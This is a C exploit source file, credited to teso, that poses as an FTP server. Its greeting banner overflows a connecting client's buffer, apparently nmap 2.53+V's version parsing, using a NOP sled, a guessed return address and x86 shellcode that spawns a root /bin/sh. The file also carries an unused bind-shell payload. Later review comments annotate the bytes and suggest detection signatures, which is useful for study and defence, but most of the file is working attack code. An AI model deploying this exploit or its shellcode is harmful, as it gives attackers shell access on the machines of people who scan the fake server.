/* mad teso ftp://ftp.saurik.com/pub/nmap/nmap-2.53+V-1.01.tgz ninja warez */
/* (nonreleased, but not) private (anymore). -typo */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Base value that main() writes into the last 4 bytes of the generated filler;
 * argv[1], when given, is added to it. 0xbffb8afc looks like a 32-bit Linux
 * user-stack address, i.e. a guessed return address.
 * NOTE(review): inferred from the value; the client code that would be
 * overflowed is not on this page. */
#define OFFSET 0xbffb8afc
/* Default length of the filler emitted between "(Version " and ") ready.";
 * also fixes the size of main()'s local buffer (LEN + 1 bytes). */
#define LEN 2072

/*
 * Payload bytes selected by `shellcode` below: 32-bit x86 Linux code that
 * enters the kernel through int 0x80. Read as instructions it issues syscall
 * 0x46 (setreuid) with ebx = ecx = 0, then syscall 0x0b (execve) on the
 * embedded "/bin/sh" string, then syscall 0x01 (exit).
 *
 * The ASCII tail after "/bin/sh" is "tesocrew!!"; the code overwrites part of
 * it at run time (string terminator and argv slots). Until then the literal
 * bytes "/bin/shtesocrew!!" are a fixed, recognisable sequence, which makes
 * them usable as a content signature on the wire.
 *
 * No 0x00 byte occurs in the array, so strlen() in main() measures all of it.
 */
unsigned char x86_local[] =
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1e\x5b\x31\xc0\x88\x43"
    "\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80"
    "\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff\xff\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21\x21";

/*
 * Alternative payload. Nothing in the visible code references it: `shellcode`
 * is initialised to x86_local, so these bytes are compiled in but never sent.
 *
 * The byte pattern contains syscall 0x02 (fork), four uses of 0x66
 * (socketcall), three of 0x3f (dup2) and one 0x0b (execve) ahead of a
 * "/bin/sh" string, which matches a fork-then-listen shell.
 * NOTE(review): read from the byte pattern only, not executed or verified;
 * the listening port is not derived here.
 *
 * For triage: a payload of this shape would show up on the victim host as the
 * scanning process (or a child of it) holding an unexpected listening TCP
 * socket with a shell attached to it.
 */
unsigned char   x86_listen[] =
    "\x31\xc0\xb0\x02\xcd\x80\x09\xc0\x74\x7c\x31\xc0\xfe\xc0\xcd\x80"
    "\x5f\x89\x4f\x10\xfe\xc1\x89\x4f\x0c\xfe\xc1\x89\x4f\x08\x8d\x4f"
    "\x08\xfe\xc3\xb0\x66\xcd\x80\xfe\xc3\xc6\x47\x10\x10\x66\x89\x5f"
    "\x14\x88\x47\x08\xb0\x45\x66\x89\x47\x16\x89\x57\x18\x8d\x4f\x14"
    "\x89\x4f\x0c\x8d\x4f\x08\xb0\x66\xcd\x80\x89\x5f\x0c\xfe\xc3\xfe"
    "\xc3\xb0\x66\xcd\x80\x89\x57\x0c\x89\x57\x10\xfe\xc3\xb0\x66\xcd"
    "\x80\x31\xc9\x88\xc3\xb0\x3f\xcd\x80\xfe\xc1\xb0\x3f\xcd\x80\xfe"
    "\xc1\xb0\x3f\xcd\x80\x31\xd2\x88\x57\x07\x89\x7f\x0c\x89\xfb\x8d"
    "\x4f\x0c\xb0\x0b\xcd\x80\x31\xc0\x99\x31\xdb\x31\xc9\xe8\x7e\xff"
    "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

/* The payload main() embeds in the banner. NOTE(review): x86_local is an
 * unsigned char array, so this initialisation relies on an implicit
 * conversion from unsigned char pointer to char pointer, which compilers
 * diagnose as a pointer-signedness mismatch. */
char *shellcode = x86_local;

/*
 * Writes one FTP-style greeting, "220 teso FTP server (Version <filler>) ready.",
 * to stdout and exits. <filler> is eob bytes long: 0x90 padding, the payload
 * at `shellcode`, four more padding bytes, then the 4-byte `offset` value.
 *
 * argv[1] (optional): decimal delta added to OFFSET.
 * argv[2] (optional): filler length; defaults to LEN.
 *
 * NOTE(review): nothing here opens a socket; presumably the program is run
 * behind inetd or a similar wrapper so that a connecting client receives the
 * banner. The file header names an nmap 2.53+V build, so the intended reader
 * of the banner is presumably that scanner's version parsing, which is not
 * shown on this page.
 *
 * Defensive reading: a greeting whose version field exceeds 2 KB and consists
 * mostly of 0x90 bytes is not a plausible FTP version string. Clients should
 * bound the length of every banner field they copy, and network sensors can
 * match on the long 0x90 run or on the payload's fixed ASCII tail.
 */
int main(int argc, char *argv[]) {
    char x[LEN+1];
    /* OFFSET (0xbffb8afc) does not fit in a signed 32-bit int, so storing it
     * in `int` is an implementation-defined conversion. atoi() reports no
     * errors: non-numeric input is silently treated as 0. */
    int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
    /* NOTE(review): eob is never range-checked. A value above LEN, or below
     * strlen(shellcode) + 8, makes the memcpy calls and the terminator write
     * below land outside x. */
    int eob    = argc > 2 ? atoi(argv[2]) : LEN;

    /* Fixed banner prefix; the filler is appended by the second printf. */
    printf("220 teso FTP server (Version ");

    /* 0x90 is the one-byte x86 NOP opcode; the whole buffer starts as padding. */
    memset(x, 0x90, sizeof(x));
    /* Place the payload so that it ends 8 bytes before position eob. */
    memcpy(x + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
    /* Last 4 bytes before eob: the raw in-memory bytes of `offset`
     * (host byte order, sizeof(int) bytes). */
    memcpy(x + eob - 4, (void *) &offset, sizeof(offset));
    /* Terminate so that %s below prints at most eob bytes. */
    x[eob] = '\0';

    printf("%s) ready.\n", x);
    exit(EXIT_SUCCESS);
}
